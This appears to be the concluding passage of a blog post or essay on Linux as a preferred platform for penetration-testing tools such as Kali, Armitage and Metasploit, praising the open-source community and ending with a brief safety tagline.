    In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or a part of a package like Armitage, Kali, Ubuntu, and of course the metasploit framework. This gives penetration testers the tools they need to perform tests against vulnerabilities by testing the exploits with different payloads. Some Windows based tools that can be used have gained notoriety but still Linux is a preferred platform. What is great about Linux and the open source community is that there are a lot of people contributing to its success. That is something that will carry the distributions forward as time and technology change.

    Just the right info to keep yourself safe!